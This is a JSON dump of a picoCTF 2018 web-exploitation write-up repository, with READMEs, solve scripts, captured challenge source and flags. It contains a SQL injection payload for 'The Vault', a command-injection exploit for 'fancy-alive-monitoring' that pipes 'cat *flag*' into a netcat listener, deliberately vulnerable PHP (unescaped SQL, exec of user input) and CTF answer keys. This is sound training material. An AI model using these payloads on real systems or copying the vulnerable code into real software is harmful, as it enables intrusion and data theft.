    "path": "Web Exploitation/Mr. Robots/solution/source/robots.txt",
    "content": "User-agent: *\nDisallow: /143ce.html\n"
  },
  {
    "path": "Web Exploitation/Mr. Robots/solution/source/style.css",
    "content": "body {\n    background-color: #1e2d3a;\n}\n\ndiv.container {\n    width: 100%;\n    height: 100%;\n    postition: relative;\n}\n\nheader {\n    background-color: #1e2d3a;\n    padding: 1em;\n    color: #d62a08;\n    clear: left;\n    text-align: center;\n    font-family: Monoton;\n    height: 80%;\n}\n\nfooter {\n    position: absolute;\n    //padding: 1em;\n    color: white;\n    background-color: #192733;\n    clear: left;\n    text-align: center;\n    bottom: 0;\n    width: 99%;\n    height: 20px;\n}\n\ndiv.content {\n    background-color: #223342;\n    padding: 1em;\n    color: white;\n    clear: left;\n    text-align: center;\n    font-family: Roboto;\n    //height: 550px;\n    height: 60%;\n}\n\nflag {\n    color: red;\n}"
  },
  {
    "path": "Web Exploitation/No Login/README.md",
    "content": "# No Login\nPoints: 200\n\n## Category\nWeb Exploitation\n\n## Question\n>Looks like someone started making a website but never got around to making a login, but I heard there was a flag if you were the admin. http://2018shell1.picoctf.com:33889 ([link](http://2018shell1.picoctf.com:33889/)) \n\n### Hint\n>What is it actually looking for in the cookie?\n\n## Solution\nSet the cookie name _admin_ and value _true_.\n\nWorking solution [solve.py](solution/solve.py)\n\n### Flag\n`picoCTF{n0l0g0n_n0_pr0bl3m_26b0181a}`\n"
  },
  {
    "path": "Web Exploitation/No Login/solution/solve.py",
    "content": "#!/usr/bin/python\n\nimport requests\nimport re\n\njar = {'admin': 'True'}\nr = requests.get('http://2018shell1.picoctf.com:33889/flag', cookies=jar)\nsource = r.text\n\nprint re.findall(r'(picoCTF\\{.+\\})', source)[0]\n"
  },
  {
    "path": "Web Exploitation/No Login/solution/source/flag",
    "content": "<!DOCTYPE html>\n<html lang=\"en\">\n\n<head>\n    <title>My New Website</title>\n\n    <link href=\"http://maxcdn.bootstrapcdn.com/bootstrap/3.2.0/css/bootstrap.min.css\" rel=\"stylesheet\">\n\n    <link href=\"https://getbootstrap.com/docs/3.3/examples/jumbotron-narrow/jumbotron-narrow.css\" rel=\"stylesheet\">\n\n    <script src=\"https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js\"></script>\n\n    <script src=\"https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js\"></script>\n\n</head>\n\n<body>\n\n    <div class=\"container\">\n        <div class=\"header\">\n            <nav>\n                <ul class=\"nav nav-pills pull-right\">\n                    <li role=\"presentation\" class=\"active\"><a href=\"#\">Home</a>\n                    </li>\n                    <li role=\"presentation\"><a href=\"/unimplemented\">Sign In</a>\n                    </li>\n                    <li role=\"presentation\"><a href=\"/unimplemented\">Sign Out</a>\n                    </li>\n                </ul>\n            </nav>\n            <h3 class=\"text-muted\">My New Website</h3>\n        </div>\n         \n        <!-- Categories: success (green), info (blue), warning (yellow), danger (red) -->\n        \n        \n        <div class=\"alert alert-warning alert-dismissible\" role=\"alert\" id=\"myAlert\">\n          <button type=\"button\" class=\"close\" data-dismiss=\"alert\" aria-label=\"Close\"><span aria-hidden=\"true\">&times;</span></button>\n          <!-- <strong>Title</strong> --> I&#39;m sorry it doesn&#39;t look like you are the admin.\n            </div>\n      \n      \n      \n        <div class=\"jumbotron\">\n            <p class=\"lead\"></p>\n            <p><a href=\"/flag\" class=\"btn btn-lg btn-success btn-block\"> Flag</a></p>\n        </div>\n\n\n        <footer class=\"footer\">\n            <p>&copy; PicoCTF 2018</p>\n        </footer>\n\n    </div>\n</body>\n\n</html>"
  },
  {
    "path": "Web Exploitation/No Login/solution/source/index.html",
    "content": "<!DOCTYPE html>\n<html lang=\"en\">\n\n<head>\n    <title>My New Website</title>\n\n    <link href=\"http://maxcdn.bootstrapcdn.com/bootstrap/3.2.0/css/bootstrap.min.css\" rel=\"stylesheet\">\n\n    <link href=\"https://getbootstrap.com/docs/3.3/examples/jumbotron-narrow/jumbotron-narrow.css\" rel=\"stylesheet\">\n\n    <script src=\"https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js\"></script>\n\n    <script src=\"https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js\"></script>\n\n</head>\n\n<body>\n\n    <div class=\"container\">\n        <div class=\"header\">\n            <nav>\n                <ul class=\"nav nav-pills pull-right\">\n                    <li role=\"presentation\" class=\"active\"><a href=\"#\">Home</a>\n                    </li>\n                    <li role=\"presentation\"><a href=\"/unimplemented\">Sign In</a>\n                    </li>\n                    <li role=\"presentation\"><a href=\"/unimplemented\">Sign Out</a>\n                    </li>\n                </ul>\n            </nav>\n            <h3 class=\"text-muted\">My New Website</h3>\n        </div>\n         \n        <!-- Categories: success (green), info (blue), warning (yellow), danger (red) -->\n        \n      \n        <div class=\"jumbotron\">\n            <p class=\"lead\"></p>\n            <p><a href=\"/flag\" class=\"btn btn-lg btn-success btn-block\"> Flag</a></p>\n        </div>\n\n\n        <footer class=\"footer\">\n            <p>&copy; PicoCTF 2018</p>\n        </footer>\n\n    </div>\n</body>\n\n</html>"
  },
  {
    "path": "Web Exploitation/No Login/solution/source/unimplemented",
    "content": "<!DOCTYPE html>\n<html lang=\"en\">\n\n<head>\n    <title>My New Website</title>\n\n    <link href=\"http://maxcdn.bootstrapcdn.com/bootstrap/3.2.0/css/bootstrap.min.css\" rel=\"stylesheet\">\n\n    <link href=\"https://getbootstrap.com/docs/3.3/examples/jumbotron-narrow/jumbotron-narrow.css\" rel=\"stylesheet\">\n\n    <script src=\"https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js\"></script>\n\n    <script src=\"https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js\"></script>\n\n</head>\n\n<body>\n\n    <div class=\"container\">\n        <div class=\"header\">\n            <nav>\n                <ul class=\"nav nav-pills pull-right\">\n                    <li role=\"presentation\" class=\"active\"><a href=\"#\">Home</a>\n                    </li>\n                    <li role=\"presentation\"><a href=\"/unimplemented\">Sign In</a>\n                    </li>\n                    <li role=\"presentation\"><a href=\"/unimplemented\">Sign Out</a>\n                    </li>\n                </ul>\n            </nav>\n            <h3 class=\"text-muted\">My New Website</h3>\n        </div>\n         \n        <!-- Categories: success (green), info (blue), warning (yellow), danger (red) -->\n        \n        \n        <div class=\"alert alert-danger alert-dismissible\" role=\"alert\" id=\"myAlert\">\n          <button type=\"button\" class=\"close\" data-dismiss=\"alert\" aria-label=\"Close\"><span aria-hidden=\"true\">&times;</span></button>\n          <!-- <strong>Title</strong> --> This isn&#39;t implemented yet.\n            </div>\n      \n      \n      \n        <div class=\"jumbotron\">\n            <p class=\"lead\"></p>\n            <p><a href=\"/flag\" class=\"btn btn-lg btn-success btn-block\"> Flag</a></p>\n        </div>\n\n\n        <footer class=\"footer\">\n            <p>&copy; PicoCTF 2018</p>\n        </footer>\n\n    </div>\n</body>\n\n</html>"
  },
  {
    "path": "Web Exploitation/Secret Agent/README.md",
    "content": "# Secret Agent\nPoints: 200\n\n## Category\nWeb Exploitation\n\n## Question\n>Here's a little website that hasn't fully been finished. But I heard google gets all your info anyway. http://2018shell1.picoctf.com:53383 ([link](http://2018shell1.picoctf.com:53383/)) \n\n### Hint\n>How can your browser pretend to be something else?\n\n## Solution\nSet the user agent to one that Google uses. For example: _Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)_\n\nWorking solution [solve.py](solution/solve.py)\n\n### Flag\n`picoCTF{s3cr3t_ag3nt_m4n_134ecd62}`\n"
  },
  {
    "path": "Web Exploitation/Secret Agent/solution/solve.py",
    "content": "#!/usr/bin/python\n\nimport requests\nimport re\n\nheaders = {\n\t'User-Agent': 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'\n}\n\nr = requests.get('http://2018shell1.picoctf.com:53383/flag', headers=headers)\nsource = r.text\n\nprint re.findall(r'(picoCTF\\{.+\\})', source)[0]\n"
  },
  {
    "path": "Web Exploitation/Secret Agent/solution/source/flag",
    "content": "<!DOCTYPE html>\n<html lang=\"en\">\n\n<head>\n    <title>My New Website</title>\n\n    <link href=\"http://maxcdn.bootstrapcdn.com/bootstrap/3.2.0/css/bootstrap.min.css\" rel=\"stylesheet\">\n\n    <link href=\"https://getbootstrap.com/docs/3.3/examples/jumbotron-narrow/jumbotron-narrow.css\" rel=\"stylesheet\">\n\n    <script src=\"https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js\"></script>\n\n    <script src=\"https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js\"></script>\n\n</head>\n\n<body>\n\n    <div class=\"container\">\n        <div class=\"header\">\n            <nav>\n                <ul class=\"nav nav-pills pull-right\">\n                    <li role=\"presentation\" class=\"active\"><a href=\"#\">Home</a>\n                    </li>\n                    <li role=\"presentation\"><a href=\"/unimplemented\">Sign In</a>\n                    </li>\n                    <li role=\"presentation\"><a href=\"/unimplemented\">Sign Out</a>\n                    </li>\n                </ul>\n            </nav>\n            <h3 class=\"text-muted\">My New Website</h3>\n        </div>\n         \n        <!-- Categories: success (green), info (blue), warning (yellow), danger (red) -->\n        \n        \n        <div class=\"alert alert-danger alert-dismissible\" role=\"alert\" id=\"myAlert\">\n          <button type=\"button\" class=\"close\" data-dismiss=\"alert\" aria-label=\"Close\"><span aria-hidden=\"true\">&times;</span></button>\n          <!-- <strong>Title</strong> --> You&#39;re not google!\nWget/1.19.5 (linux-gnu)\n            </div>\n      \n      \n      \n        <div class=\"jumbotron\">\n            <p class=\"lead\"></p>\n            <p><a href=\"/flag\" class=\"btn btn-lg btn-success btn-block\"> Flag</a></p>\n        </div>\n\n\n        <footer class=\"footer\">\n            <p>&copy; PicoCTF 2018</p>\n        </footer>\n\n    </div>\n    <script>\n    $(document).ready(function(){\n        
$(\".close\").click(function(){\n            $(\"myAlert\").alert(\"close\");\n        });\n    });\n    </script>\n</body>\n\n</html>"
  },
  {
    "path": "Web Exploitation/Secret Agent/solution/source/index.html",
    "content": "<!DOCTYPE html>\n<html lang=\"en\">\n\n<head>\n    <title>My New Website</title>\n\n    <link href=\"http://maxcdn.bootstrapcdn.com/bootstrap/3.2.0/css/bootstrap.min.css\" rel=\"stylesheet\">\n\n    <link href=\"https://getbootstrap.com/docs/3.3/examples/jumbotron-narrow/jumbotron-narrow.css\" rel=\"stylesheet\">\n\n    <script src=\"https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js\"></script>\n\n    <script src=\"https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js\"></script>\n\n</head>\n\n<body>\n\n    <div class=\"container\">\n        <div class=\"header\">\n            <nav>\n                <ul class=\"nav nav-pills pull-right\">\n                    <li role=\"presentation\" class=\"active\"><a href=\"#\">Home</a>\n                    </li>\n                    <li role=\"presentation\"><a href=\"/unimplemented\">Sign In</a>\n                    </li>\n                    <li role=\"presentation\"><a href=\"/unimplemented\">Sign Out</a>\n                    </li>\n                </ul>\n            </nav>\n            <h3 class=\"text-muted\">My New Website</h3>\n        </div>\n         \n        <!-- Categories: success (green), info (blue), warning (yellow), danger (red) -->\n        \n      \n        <div class=\"jumbotron\">\n            <p class=\"lead\"></p>\n            <p><a href=\"/flag\" class=\"btn btn-lg btn-success btn-block\"> Flag</a></p>\n        </div>\n\n\n        <footer class=\"footer\">\n            <p>&copy; PicoCTF 2018</p>\n        </footer>\n\n    </div>\n    <script>\n    $(document).ready(function(){\n        $(\".close\").click(function(){\n            $(\"myAlert\").alert(\"close\");\n        });\n    });\n    </script>\n</body>\n\n</html>"
  },
  {
    "path": "Web Exploitation/Secret Agent/solution/source/unimplemented",
    "content": "<!DOCTYPE html>\n<html lang=\"en\">\n\n<head>\n    <title>My New Website</title>\n\n    <link href=\"http://maxcdn.bootstrapcdn.com/bootstrap/3.2.0/css/bootstrap.min.css\" rel=\"stylesheet\">\n\n    <link href=\"https://getbootstrap.com/docs/3.3/examples/jumbotron-narrow/jumbotron-narrow.css\" rel=\"stylesheet\">\n\n    <script src=\"https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js\"></script>\n\n    <script src=\"https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js\"></script>\n\n</head>\n\n<body>\n\n    <div class=\"container\">\n        <div class=\"header\">\n            <nav>\n                <ul class=\"nav nav-pills pull-right\">\n                    <li role=\"presentation\" class=\"active\"><a href=\"#\">Home</a>\n                    </li>\n                    <li role=\"presentation\"><a href=\"/unimplemented\">Sign In</a>\n                    </li>\n                    <li role=\"presentation\"><a href=\"/unimplemented\">Sign Out</a>\n                    </li>\n                </ul>\n            </nav>\n            <h3 class=\"text-muted\">My New Website</h3>\n        </div>\n         \n        <!-- Categories: success (green), info (blue), warning (yellow), danger (red) -->\n        \n        \n        <div class=\"alert alert-danger alert-dismissible\" role=\"alert\" id=\"myAlert\">\n          <button type=\"button\" class=\"close\" data-dismiss=\"alert\" aria-label=\"Close\"><span aria-hidden=\"true\">&times;</span></button>\n          <!-- <strong>Title</strong> --> This isn&#39;t implemented yet.\n            </div>\n      \n      \n      \n        <div class=\"jumbotron\">\n            <p class=\"lead\"></p>\n            <p><a href=\"/flag\" class=\"btn btn-lg btn-success btn-block\"> Flag</a></p>\n        </div>\n\n\n        <footer class=\"footer\">\n            <p>&copy; PicoCTF 2018</p>\n        </footer>\n\n    </div>\n    <script>\n    $(document).ready(function(){\n        
$(\".close\").click(function(){\n            $(\"myAlert\").alert(\"close\");\n        });\n    });\n    </script>\n</body>\n\n</html>"
  },
  {
    "path": "Web Exploitation/Secure Logon/README.md",
    "content": "# Secure Logon\nPoints: 500\n\n## Category\nWeb Exploitation\n\n## Question\n>Uh oh, the login page is more secure... I think. http://2018shell1.picoctf.com:12004 ([link](http://2018shell1.picoctf.com:12004/)). [Source](files/server_noflag.py). \n\n### Hint\n>There are versions of AES that really aren't secure.\n\n## Solution\nUnsolved\n\n### Flag\n`flag`\n"
  },
  {
    "path": "Web Exploitation/Secure Logon/files/server_noflag.py",
    "content": "from flask import Flask, render_template, request, url_for, redirect, make_response, flash\nimport json\nfrom hashlib import md5\nfrom base64 import b64decode\nfrom base64 import b64encode\nfrom Crypto import Random\nfrom Crypto.Cipher import AES\n\napp = Flask(__name__)\napp.secret_key = 'seed removed'\nflag_value = 'flag removed'\n\nBLOCK_SIZE = 16  # Bytes\npad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * \\\n                chr(BLOCK_SIZE - len(s) % BLOCK_SIZE)\nunpad = lambda s: s[:-ord(s[len(s) - 1:])]\n\n\n@app.route(\"/\")\ndef main():\n    return render_template('index.html')\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n    if request.form['user'] == 'admin':\n        message = \"I'm sorry the admin password is super secure. You're not getting in that way.\"\n        category = 'danger'\n        flash(message, category)\n        return render_template('index.html')\n    resp = make_response(redirect(\"/flag\"))\n\n    cookie = {}\n    cookie['password'] = request.form['password']\n    cookie['username'] = request.form['user']\n    cookie['admin'] = 0\n    print(cookie)\n    cookie_data = json.dumps(cookie, sort_keys=True)\n    encrypted = AESCipher(app.secret_key).encrypt(cookie_data)\n    print(encrypted)\n    resp.set_cookie('cookie', encrypted)\n    return resp\n\n@app.route('/logout')\ndef logout():\n    resp = make_response(redirect(\"/\"))\n    resp.set_cookie('cookie', '', expires=0)\n    return resp\n\n@app.route('/flag', methods=['GET'])\ndef flag():\n  try:\n      encrypted = request.cookies['cookie']\n  except KeyError:\n      flash(\"Error: Please log-in again.\")\n      return redirect(url_for('main'))\n  data = AESCipher(app.secret_key).decrypt(encrypted)\n  data = json.loads(data)\n\n  try:\n     check = data['admin']\n  except KeyError:\n     check = 0\n  if check == 1:\n      return render_template('flag.html', value=flag_value)\n  flash(\"Success: You logged in! 
Not sure you'll be able to see the flag though.\", \"success\")\n  return render_template('not-flag.html', cookie=data)\n\nclass AESCipher:\n    \"\"\"\n    Usage:\n        c = AESCipher('password').encrypt('message')\n        m = AESCipher('password').decrypt(c)\n    Tested under Python 3 and PyCrypto 2.6.1.\n    \"\"\"\n\n    def __init__(self, key):\n        self.key = md5(key.encode('utf8')).hexdigest()\n\n    def encrypt(self, raw):\n        raw = pad(raw)\n        iv = Random.new().read(AES.block_size)\n        cipher = AES.new(self.key, AES.MODE_CBC, iv)\n        return b64encode(iv + cipher.encrypt(raw))\n\n    def decrypt(self, enc):\n        enc = b64decode(enc)\n        iv = enc[:16]\n        cipher = AES.new(self.key, AES.MODE_CBC, iv)\n        return unpad(cipher.decrypt(enc[16:])).decode('utf8')\n\nif __name__ == \"__main__\":\n    app.run()\n"
  },
  {
    "path": "Web Exploitation/The Vault/README.md",
    "content": "# The Vault\nPoints: 250\n\n## Category\nWeb Exploitation\n\n## Question\n>There is a website running at http://2018shell1.picoctf.com:56537 ([link](http://2018shell1.picoctf.com:56537/)). Try to see if you can login! \n\n### Hint\nNo Hints.\n\n## Solution\nAn SQLi challenge where the PHP code running the query filters out the term _OR_.\n\nUsing _LIKE_, we can circumvent the filter.\n\nWorking solution: [solve.py](solution/solve.py)\n\n### Flag\n`picoCTF{w3lc0m3_t0_th3_vau1t_c09f30a0}`\n"
  },
  {
    "path": "Web Exploitation/The Vault/solution/solve.py",
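    "content": "#!/usr/bin/python\n\nimport requests\nimport re\n\n# The server-side check in login.php filters on the term OR, so the payload uses LIKE instead.\nparams = {\n\t'username': \"' LIKE '%'; --\",\n\t'password' : '',\n\t'debug': '0'\n}\n\nr = requests.post('http://2018shell1.picoctf.com:56537/login.php', data=params)\n# print() with a single argument behaves the same on Python 2 and Python 3\nprint(re.findall(r'(picoCTF\\{.+\\})', r.text)[0])\n"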
  },
  {
    "path": "Web Exploitation/The Vault/solution/source/index.html",
    "content": "<!doctype html>\n<html>\n<head>\n    <title>Login</title>\n    <link rel=\"stylesheet\" type=\"text/css\" href=\"//maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap.min.css\">\n</head>\n<body>\n<div class=\"container\">\n    <div class=\"row\">\n        <div class=\"col-md-12\">\n            <div class=\"panel panel-primary\" style=\"margin-top:50px\">\n                <div class=\"panel-heading\">\n                    <h3 class=\"panel-title\">Log In</h3>\n                </div>\n                <div class=\"panel-body\">\n                    <form action=\"login.php\" method=\"POST\">\n                        <fieldset>\n                            <div class=\"form-group\">\n                                <label for=\"username\">Username:</label>\n                                <input type=\"text\" id=\"username\" name=\"username\" class=\"form-control\">\n                            </div>\n                            <div class=\"form-group\">\n                                <label for=\"password\">Password:</label>\n                                <div class=\"controls\">\n                                    <input type=\"password\" id=\"password\" name=\"password\" class=\"form-control\">\n                                </div>\n                            </div>\n\n                            <input type=\"hidden\" name=\"debug\" value=\"0\">\n\n                            <div class=\"form-actions\">\n                                <input type=\"submit\" value=\"Login\" class=\"btn btn-primary\">\n                            </div>\n                        </fieldset>\n                    </form>\n                </div>\n            </div>\n            <a href=\"login.txt\">login.php source code</a>\n        </div>\n    </div>\n</div>\n</body>\n</html>\n"
  },
  {
    "path": "Web Exploitation/The Vault/solution/source/login.txt",
    "content": "<?php\n  ini_set('error_reporting', E_ALL);\n  ini_set('display_errors', 'On');\n\n  include \"config.php\";\n  $con = new SQLite3($database_file);\n\n  $username = $_POST[\"username\"];\n  $password = $_POST[\"password\"];\n  $debug = $_POST[\"debug\"];\n  $query = \"SELECT 1 FROM users WHERE name='$username' AND password='$password'\";\n\n  if (intval($debug)) {\n    echo \"<pre>\";\n    echo \"username: \", htmlspecialchars($username), \"\\n\";\n    echo \"password: \", htmlspecialchars($password), \"\\n\";\n    echo \"SQL query: \", htmlspecialchars($query), \"\\n\";\n    echo \"</pre>\";\n  }\n\n  //validation check\n  $pattern =\"/.*['\\\"].*OR.*/i\";\n  $user_match = preg_match($pattern, $username);\n  $password_match = preg_match($pattern, $username);\n  if($user_match + $password_match > 0)  {\n    echo \"<h1>SQLi detected.</h1>\";\n  }\n  else {\n    $result = $con->query($query);\n    $row = $result->fetchArray();\n    \n    if ($row) {\n      echo \"<h1>Logged in!</h1>\";\n      echo \"<p>Your flag is: $FLAG</p>\";\n    } else {\n      echo \"<h1>Login failed.</h1>\";\n    }\n  }\n  \n?>\n"
  },
  {
    "path": "Web Exploitation/fancy-alive-monitoring/README.md",
    "content": "# fancy-alive-monitoring\nPoints: 400\n\n## Category\nWeb Exploitation\n\n## Question\n>One of my school mate developed an alive monitoring tool. Can you get a flag from http://2018shell1.picoctf.com:31070 ([link](http://2018shell1.picoctf.com:31070/))? \n\n### Hint\n>This application uses the validation check both on the client side and on the server side, but the server check seems to be inappropriate.\n>\n>You should be able to listen through the shell on the server.\n\n## Solution\nLooking at the PHP source code, we can see that the server-side regex is missing a _$_ anchor at the end. This means that we can append any shell command after the IP address.\n\nThere's also a client-side JavaScript check, but we can circumvent it by sending the request with Python.\n\nAll we have to do is to append a listener using netcat and get the flag. In this case, I set the port to 54433. Pipe the output of `cat *flag*` into the listener to receive the flag.\n\nExploit: `8.8.8.8; cat *flag* | nc -lp 54433`. _8.8.8.8_ is used because that's the IP of Google's DNS. I used it just to speed up the process.\n\nFinally, we connect to the server using netcat and get the flag: `nc 2018shell1.picoctf.com 54433`.\n\nWorking solution: [solve.py](solution/solve.py)\n\n### Flag\n`picoCTF{n3v3r_trust_a_b0x_91345b04}`\n"
  },
  {
    "path": "Web Exploitation/fancy-alive-monitoring/solution/solve.py",
    "content": "#!/usr/bin/python\nfrom pwn import *\nimport requests\nimport threading\nfrom time import sleep\nimport re\n\nPORT = 54433\n\n# The POST blocks while the injected listener waits for a connection, so it runs in its own thread.\ndef exploit(whut, exploit):\n\tlog.info('Sending exploit...')\n\tparams = {\n\t\t'ip': exploit\n\t}\n\n\tr = requests.post('http://2018shell1.picoctf.com:31070/index.php', data=params)\n\t\n\nthreading.Thread(target=exploit, args=(None, '8.8.8.8; cat *flag* | nc -lp {}'.format(PORT))).start()\nlog.success('Exploit sent!')\n\nlog.info('Connecting to shell in 3 seconds...')\nsleep(3)\nr = remote('2018shell1.picoctf.com', PORT)\n# recv() returns bytes on Python 3; decode so the str regex below matches\nflag = r.recv().decode()\nr.close()\n\nlog.success('Flag: ' + re.findall(r'(picoCTF\\{.+\\})', flag)[0])\n"
  },
  {
    "path": "Web Exploitation/fancy-alive-monitoring/solution/source/index.php",
    "content": "<html>\n<head>\n\t<title>Monitoring Tool</title>\n\t<script>\n\tfunction check(){\n\t\tip = document.getElementById(\"ip\").value;\n\t\tchk = ip.match(/^\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}$/);\n\t\tif (!chk) {\n\t\t\talert(\"Wrong IP format.\");\n\t\t\treturn false;\n\t\t} else {\n\t\t\tdocument.getElementById(\"monitor\").submit();\n\t\t}\n\t}\n\t</script>\n</head>\n<body>\n\t<h1>Monitoring Tool ver 0.1</h1>\n\t<form id=\"monitor\" action=\"index.php\" method=\"post\" onsubmit=\"return false;\">\n\t<p> Input IP address of the target host\n\t<input id=\"ip\" name=\"ip\" type=\"text\">\n\t</p>\n\t<input type=\"button\" value=\"Go!\" onclick=\"check()\">\n\t</form>\n\t<hr>\n\n<hr>\n<a href=\"index.txt\">index.php source code</a>\n</body>\n</html>\n"
  },
  {
    "path": "Web Exploitation/fancy-alive-monitoring/solution/source/index.txt",
    "content": "<html>\n<head>\n\t<title>Monitoring Tool</title>\n\t<script>\n\tfunction check(){\n\t\tip = document.getElementById(\"ip\").value;\n\t\tchk = ip.match(/^\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}$/);\n\t\tif (!chk) {\n\t\t\talert(\"Wrong IP format.\");\n\t\t\treturn false;\n\t\t} else {\n\t\t\tdocument.getElementById(\"monitor\").submit();\n\t\t}\n\t}\n\t</script>\n</head>\n<body>\n\t<h1>Monitoring Tool ver 0.1</h1>\n\t<form id=\"monitor\" action=\"index.php\" method=\"post\" onsubmit=\"return false;\">\n\t<p> Input IP address of the target host\n\t<input id=\"ip\" name=\"ip\" type=\"text\">\n\t</p>\n\t<input type=\"button\" value=\"Go!\" onclick=\"check()\">\n\t</form>\n\t<hr>\n\n<?php\n$ip = $_POST[\"ip\"];\nif ($ip) {\n\t// super fancy regex check!\n\tif (preg_match('/^(([1-9]?[0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]).){3}([1-9]?[0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])/',$ip)) {\n\t\texec('ping -c 1 '.$ip, $cmd_result);\n\t\tforeach($cmd_result as $str){\n\t\t\tif (strpos($str, '100% packet loss') !== false){\n\t\t\t\tprintf(\"<h3>Target is NOT alive.</h3>\");\n\t\t\t\tbreak;\n\t\t\t} else if (strpos($str, ', 0% packet loss') !== false){\n\t\t\t\tprintf(\"<h3>Target is alive.</h3>\");\n\t\t\t\tbreak;\n\t\t\t}\n\t\t}\n\t} else {\n\t\techo \"Wrong IP Format.\";\n\t}\n}\n?>\n<hr>\n<a href=\"index.txt\">index.php source code</a>\n</body>\n</html>\n"
  },
  {
    "path": "_config.yml",
    "content": "theme: jekyll-theme-hacker"
  },
  {
    "path": "template/README.md",
    "content": "# Question\nPoints: pts\n\n## Category\nCategory\n\n## Question\n>Question goes here\n\n### Hint\n>Hint goes here\n\n## Solution\nSolution here\n\n### Flag\n`Flag`\n"
  }
]